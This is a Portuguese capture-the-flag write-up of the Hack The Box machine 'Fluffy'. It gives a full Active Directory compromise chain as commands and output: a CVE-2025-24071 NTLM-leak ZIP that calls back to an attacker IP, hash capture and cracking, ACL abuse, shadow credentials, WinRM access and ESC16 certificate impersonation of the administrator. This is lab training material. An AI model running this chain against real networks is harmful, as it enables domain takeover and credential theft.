Author: Nullbyte
Fluffy é uma máquina do hackthebox que ataca os princípios de uma rede corporativa, explorando cada detalhe de vulnerabilidade, cada byte, cada bit.
Let's hack!
Credenciais:
"As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!"
Recon
┌──(root㉿kali)-[/tmp]
└─# scan fluffy.htb
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.85.197:53
Open 10.129.85.197:88
Open 10.129.85.197:139
Open 10.129.85.197:389
Open 10.129.85.197:445
Open 10.129.85.197:464
Open 10.129.85.197:593
Open 10.129.85.197:636
Open 10.129.85.197:3269
Open 10.129.85.197:3268
Open 10.129.85.197:5985
Open 10.129.85.197:9389
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-30 03:02:41Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49717/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=7/29%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68892942%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=U)
SEQ(SP=104%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
OPS(O1=M552NW8NNS%O2=M552NW8NNS%O3=M552NW8%O4=M552NW8NNS%O5=M552NW8NNS%O6=M552NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43914/tcp): CLEAN (Timeout)
| Check 2 (port 45400/tcp): CLEAN (Timeout)
| Check 3 (port 29708/udp): CLEAN (Timeout)
| Check 4 (port 37110/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-30T03:03:37
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
TRACEROUTE (using port 49690/tcp)
HOP RTT ADDRESS
1 144.00 ms 10.10.14.1 (10.10.14.1)
2 145.84 ms fluffy.htb (10.129.85.197)[0x0539] > Analisando, podemos
observar algumas portas que provavelmente serão muito
importantes: 445, 389,
88, 5985. Iniciaremos
analisando o serviço SMB
utilizado para compartilhamento de arquivos e até mesmo
execução de código remoto (Dependendo do usuário).
- Trick: usando
nxcpara enumerar o smb
┌──(root㉿kali)-[/tmp]
└─# nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.85.197 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.85.197 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.85.197 445 DC01 [*] Enumerated shares
SMB 10.129.85.197 445 DC01 Share Permissions Remark
SMB 10.129.85.197 445 DC01 ----- ----------- ------
SMB 10.129.85.197 445 DC01 ADMIN$ Remote Admin
SMB 10.129.85.197 445 DC01 C$ Default share
SMB 10.129.85.197 445 DC01 IPC$ READ Remote IPC
SMB 10.129.85.197 445 DC01 IT READ,WRITE
SMB 10.129.85.197 445 DC01 NETLOGON READ Logon server share
SMB 10.129.85.197 445 DC01 SYSVOL READ Logon server share┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls'
Password for [WORKGROUP\j.fleischman]:
. D 0 Tue Jul 29 23:23:33 2025
.. D 0 Tue Jul 29 23:23:33 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1844516 blocks available┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls;get Upgrade_Notice.pdf'
Password for [WORKGROUP\j.fleischman]:
. D 0 Tue Jul 29 23:23:33 2025
.. D 0 Tue Jul 29 23:23:33 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1880881 blocks available
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (148.2 KiloBytes/sec) (average 148.2 KiloBytes/sec)[0x0539] > Abrindo o PDF
podemos descobrir que alguma das vulnerabilidades
listadas está presente na rede. Nós temos uma
vulnerabilidade muito interessante, buscando na internet
achamos uma CVE que nos permite ganhar
algum acesso.
CVE-2025-24071 -> https://github.com/FOLKS-iwd/CVE-2025-24071-msfvenom
.7
.'/
/ /
/ /
/ /
/ /
/ /
/ /
/ /
/ /
__|/
,-\__\
|f-"Y\|
\()7L/
cgD __ _
|\( .' Y '>,
\ \ / _ _ \
\\\ )(_) (_)(|}
\\\ { 4A } /
\\\ \uLuJJ/\l
\\\ |3 p)/
\\\___ __________ /nnm_n//
c7___-__,__-)\,__)(". \_>-<_/D
//V \_"-._.__G G_c__.-__<"/ ( \
<"-._>__-,G_.___)\ \7\
("-.__.| \"<.__.-" ) \ \
|"-.__"\ |"-.__.-".\ \ \
("-.__"". \"-.__.-".| \_\
\"-.__""|!|"-.__.-".) \ \
"-.__""\_|"-.__.-"./ \ l
".__""">G>-.__.-"> .--,_
"" G-Exploitation Vulnerabilities-
[0x0539] > Executando os passos para
gerar a carga útil com metasploit
msf6 auxiliary(server/ntlm_hash_leak) > options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes The IP address to which the SMB request will be sent
FILENAME exploit.zip yes The name of the ZIP file to create
LIBRARY_NAME malicious.library-ms yes The name of the .library-ms file
SHARE_NAME shared yes The SMB share name to use in the .library-ms file
View the full module info with the info, or info -d command.
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 10.10.14.184
ATTACKER_IP => 10.10.14.184
msf6 auxiliary(server/ntlm_hash_leak) > exploit
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
msf6 auxiliary(server/ntlm_hash_leak) > pwd
[*] exec: pwd
/root/windows/ctf/fluffy/CVE-2025-24071-msfvenom[0x0539] > Fazendo o upload do
payload criado pelo metasploit
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ls
exploit.zip ntlm_hash_leak.rb README.md
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman'
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.8 kb/s) (average 0.8 kb/s)
smb: \> [0x0539] > ""Sniffando"" a rede até
obter a hash do usuário p.agila
┌──(root㉿kali)-[/home/nullbyte]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.85.197
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:HIDDEN[0x0539] > "Quebrando" a hash do
usuário p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash_p.agila
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:10 DONE (2025-07-29 17:42) 0.09354g/s 422579p/s 422579c/s 422579C/s proquis..prom pics
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. [0x0539] > Vendo quais permissões
tenho com o usuário p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=fluffy,DC=htb
permission: WRITE
distinguishedName: CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb
permission: WRITE
distinguishedName: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE[0x0539] > O usuário
p.agila tem algumas permissões importantes,
como DACL, OWNER.
[0x0539] > Podemos então tomar controle
do grupo e assim obter controle total dos objetos do
grupo, e sendo proprietário, obtemos privilégio de todas
as contas que pertencem a esse grupo!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' set owner "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] Old owner S-1-5-21-497550768-2797716248-2627064577-512 is now replaced by p.agila on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb[0x0539] > adicionando permissão
geral sobre o grupo Service Accounts com o
usuário p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add genericAll "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] p.agila has now GenericAll on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb[0x0539] > adicionando o usuário
p.agila no grupo
Service Accounts
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] p.agila added to CN=Service Accounts,CN=Users,DC=fluffy,DC=htb[0x0539] > Identificando membros do
grupo Service Accounts.
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ldapsearch -x -H ldap://10.129.85.197 -D 'p.agila@fluffy.htb' -w 'prometheusx-303' -b "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" | grep member
member: CN=winrm service,CN=Users,DC=fluffy,DC=htb
member: CN=ldap service,CN=Users,DC=fluffy,DC=htb
member: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb[0x0539] > Pelo que podemos ver,
temos 3 membros, e os membros têm nomes de
serviços. Dois deles são interessantes para nós:
winrm,
certificate authority.
[0x0539] > Lembram que temos
permissão de DACL? Podemos fazer um ataque de shadow
credential com essas contas de serviço!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# pywhisker --dc-host 10.129.85.197 -d fluffy.htb -u p.agila -p 'prometheusx-303' /
-t winrm_svc -a add
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 27d0d9a6-ada7-3dda-2ac3-1cf08fd76e61
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: Qhe8WZes.pfx
[+] PFX exportiert nach: Qhe8WZes.pfx
[i] Passwort für PFX: 4xN1LvZWPxl2VRHyampW
[+] Saved PFX (#PKCS12) certificate & key at path: Qhe8WZes.pfx
[*] Must be used with password: 4xN1LvZWPxl2VRHyampW
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools[0x0539] > Após obter o PFX nesse
caso vou fazer com a winrm e podemos se conectar por ela
assim podemos obter nossa flag de user.txt!
lembrando que os certificados no AD são bastante importantentes, se obtermos um certificado de algum usuário podemos obter a hash dele atraves de um simples certificado!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy auth -pfx Qhe8WZes.pfx -password "4xN1LvZWPxl2VRHyampW" -username 'winrm_svc' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -domain fluffy.htb -no-save
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Got hash for 'winrm_svc@fluffy.htb': [0x0539] > pegando a
Flag!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# evil-winrm -i 10.129.85.197 -u 'winrm_svc' -p 'hash ntlm'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/29/2025 8:00 PM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
0c169e83b26e682d HIDDEN HAHAHAHA
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> [0x0539] > Agora vamos ver a conta de
serviço certificate authority, e ver quais
permissões ela tem.
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-08-01T21:53:02+00:00[0x0539] > Vamos gerar um ticket TGT
para conseguir logar na conta em qualquer serviço :)
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# python3 /root/windows/python3-impacket/examples/getTGT.py fluffy.htb/ca_svc /
-hashes 'hash ntml'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in ca_svc.ccache
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# export KRB5CCNAME=ca_svc.ccache
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# klist
Ticket cache: FILE:ca_svc.ccache
Default principal: ca_svc@FLUFFY.HTB
Valid starting Expires Service principal
07/30/2025 01:49:13 07/30/2025 11:49:13 krbtgt/FLUFFY.HTB@FLUFFY.HTB
renew until 07/31/2025 01:49:12[0x0539] > Verificando templates
vulneraveis agora que temos acesso a conta
CA_SVC podemos explorar Certificados!
podemos ver que tem vulnerabilidadede no certificado
chamada ESC16, essa vulnerabilidade de
forma resumida permite gerar certificado se passando por
qualquer usuário alterando a UPN vamos ao
exemplo, somos o usuário ca_svc temos controle sobre o
ADCS, vamos adicionar o UPN do
administrator a nossa conta ca_svc assim
podemos solicitar certificado no template user, como o
UPN é do administrator o usuário
ca_svc acaba se passando pelo administrator
e obtemos o pfx do administrator. segue abaixo a cadeia
de ataques. se tiver interresado em entender de forma
detalhada:
https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy find -username 'ca_svc' -k -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.[0x0539] > Explorando o
ESC16, e mudando o UPN da
CA_SVC
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -upn 'administrator' /
-user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'[0x0539] > confirmando se está setado
o UPN do administrator
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-08-01T21:53:02+00:00[0x0539] > obtendo o PFX
do administrator
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug req -username 'administrator' -hashes ':hash' -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: None
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'ADMINISTRATOR'
[+] Trying to resolve 'DC01.fluffy.htb' at '10.129.164.91'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'[0x0539] > Mudando o UPN
para os devidos usuários!
[0x0539] > Agora temos que se atentar
a um detalhe importante para não ter conflito na hora de
autenticarmos com o certificado. Temos que voltar o
UPN da conta do ca_svc para a
ca_svc@fluffy.htb
ou seja o UPN dele, assim o administrator
vai ter o UPN dele mesmo no caso o administrator@fluffy.htb,
e o ca_svc com o ca_svc@fluffy.htb.
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' -dc-ip 10.129.164.91 -ns 10.129.164.91 /
-target DC01.fluffy.htb -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
